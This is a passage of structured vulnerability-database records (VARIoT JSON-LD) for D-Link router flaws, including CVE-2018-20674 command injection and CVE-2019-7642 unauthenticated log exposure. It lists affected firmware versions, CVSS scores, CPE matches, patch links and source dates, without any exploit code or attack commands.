        "id": "JVNDB-2018-013973"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-20675"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.8,
        "url": "https://securityadvisories.dlink.com/announcement/publication.aspx?name=sap10101"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-20675"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20675"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/287.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-131505"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-20675"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013973"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-20675"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-138"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-131505"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-20675"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013973"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-20675"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-138"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-01-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-131505"
      },
      {
        "date": "2019-01-09T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-20675"
      },
      {
        "date": "2019-03-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-013973"
      },
      {
        "date": "2019-01-09T00:29:00.240000",
        "db": "NVD",
        "id": "CVE-2018-20675"
      },
      {
        "date": "2019-01-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201901-138"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-01-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-131505"
      },
      {
        "date": "2021-04-23T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-20675"
      },
      {
        "date": "2019-03-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-013973"
      },
      {
        "date": "2021-04-23T15:56:12.473000",
        "db": "NVD",
        "id": "CVE-2018-20675"
      },
      {
        "date": "2021-04-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201901-138"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-138"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Authentication vulnerabilities in multiple D-Link products",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013973"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "authorization issue",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-138"
      }
    ],
    "trust": 0.6
  }
}

VAR-201901-1554

Vulnerability from variot - Updated: 2023-12-18 12:50

Multiple D-Link products contain a command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The D-Link DIR-822 C1 and the other affected models are all D-Link wireless routers. A command execution vulnerability exists in several D-Link products that can be exploited by remote attackers to execute commands. The following products and versions are affected: D-Link DIR-822 C1 with firmware prior to v3.11B01Beta; DIR-822-US C1 with firmware prior to v3.11B01Beta; DIR-850L A* with firmware prior to v1.21B08Beta; DIR-850L B* with firmware prior to v2.22B03Beta; DIR-880L A* with firmware prior to v1.20B02Beta


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201901-1554",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "2.22b02"
      },
      {
        "model": "dir-822-us",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.10b06"
      },
      {
        "model": "dir-880l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.20b01"
      },
      {
        "model": "dir-880l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.07.b08"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.21b07"
      },
      {
        "model": "dir-822",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.10b06"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "2.21b01"
      },
      {
        "model": "dir-822",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "3.11b01beta"
      },
      {
        "model": "dir-822-us",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "3.11b01beta"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.21b08beta"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "2.22b03beta"
      },
      {
        "model": "dir-880l",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.20b02beta"
      },
      {
        "model": "dir-850l b* \u003cv2.22b03beta",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-822 c1 \u003cv3.11b01beta",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-822-us c1 \u003cv3.11b01beta",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l a* \u003cv1.21b08beta",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-880l a* \u003cv1.20b02beta",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-01715"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013972"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-20674"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-822_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.10b06",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-822:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-822-us_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.10b06",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-822-us:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.21b07",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "2.21b01",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:2.22b02:beta:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-880l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.07.b08",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-880l_firmware:1.20b01:beta:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-880l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-20674"
      }
    ]
  },
  "cve": "CVE-2018-20674",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 6.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2018-20674",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2019-01715",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "VHN-131504",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2018-20674",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2018-20674",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2019-01715",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201901-139",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-131504",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-01715"
      },
      {
        "db": "VULHUB",
        "id": "VHN-131504"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013972"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-20674"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-139"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple D-Link products contain a command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The D-Link DIR-822 C1 and the other affected models are all D-Link wireless routers. A command execution vulnerability exists in several D-Link products that can be exploited by remote attackers to execute commands. The following products and versions are affected: D-Link DIR-822 C1 with firmware prior to v3.11B01Beta; DIR-822-US C1 with firmware prior to v3.11B01Beta; DIR-850L A* with firmware prior to v1.21B08Beta; DIR-850L B* with firmware prior to v2.22B03Beta; DIR-880L A* with firmware prior to v1.20B02Beta",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013972"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-01715"
      },
      {
        "db": "VULHUB",
        "id": "VHN-131504"
      }
    ],
    "trust": 1.35
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-20674",
        "trust": 3.1
      },
      {
        "db": "DLINK",
        "id": "SAP10101",
        "trust": 2.3
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013972",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-139",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-01715",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-131504",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-01715"
      },
      {
        "db": "VULHUB",
        "id": "VHN-131504"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013972"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-20674"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-139"
      }
    ]
  },
  "id": "VAR-201901-1554",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-01715"
      },
      {
        "db": "VULHUB",
        "id": "VHN-131504"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-01715"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:50:26.588000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L Rev. Ax/Bx, DIR-880L Rev.Ax, DIR-822 Rev. Cx :: Authenticated Command Bypass \u0026 Authenticated Remote Command Execution (RCE)",
        "trust": 0.8,
        "url": "https://securityadvisories.dlink.com/announcement/publication.aspx?name=sap10101"
      },
      {
        "title": "Patches for multiple D-Link product command execution vulnerabilities",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/150341"
      },
      {
        "title": "Multiple D-Link Product security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=88327"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-01715"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013972"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-139"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-77",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-131504"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013972"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-20674"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.3,
        "url": "https://securityadvisories.dlink.com/announcement/publication.aspx?name=sap10101"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-20674"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20674"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-01715"
      },
      {
        "db": "VULHUB",
        "id": "VHN-131504"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013972"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-20674"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-139"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-01715"
      },
      {
        "db": "VULHUB",
        "id": "VHN-131504"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013972"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-20674"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-139"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-01-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-01715"
      },
      {
        "date": "2019-01-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-131504"
      },
      {
        "date": "2019-03-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-013972"
      },
      {
        "date": "2019-01-09T00:29:00.210000",
        "db": "NVD",
        "id": "CVE-2018-20674"
      },
      {
        "date": "2019-01-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201901-139"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-01-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-01715"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-131504"
      },
      {
        "date": "2019-03-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-013972"
      },
      {
        "date": "2019-10-03T00:03:26.223000",
        "db": "NVD",
        "id": "CVE-2018-20674"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201901-139"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-139"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "plural  D-Link Command injection vulnerability in product devices",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013972"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "command injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-139"
      }
    ],
    "trust": 0.6
  }
}

VAR-201903-0482

Vulnerability from variot - Updated: 2023-12-18 12:43

D-Link routers with the mydlink feature expose some web interfaces that do not require authentication. An attacker can remotely obtain users' DNS query logs and login logs. Vulnerable targets include but are not limited to the latest firmware versions of DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-816 (B1-2.06?), DIR-850L (A1-1.09), and DIR-868L (A1-1.10). Multiple D-Link products contain authentication vulnerabilities. Information may be obtained. D-Link is a company specializing in the design and development of computer network equipment. The D-Link DIR-817LW is a wireless router from D-Link of Taiwan, China. An information disclosure vulnerability exists in the D-Link router (D-Link DIR-817LW, etc.). The following products are affected: D-Link DIR-817LW (A1-1.04); DIR-816L (B1-2.06); DIR-816 (B1-2.06); DIR-850L (A1-1.09); DIR-868L (A1-1.10). The record below tracks this issue as CVE-2019-7642 and classifies it as CWE-306 (missing authentication) and CWE-287; its CVSS vectors rate the impact as confidentiality-only, reachable over the network without privileges.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201903-0482",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.09"
      },
      {
        "model": "dir-868l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.10"
      },
      {
        "model": "dir-816",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "2.06"
      },
      {
        "model": "dir-816l",
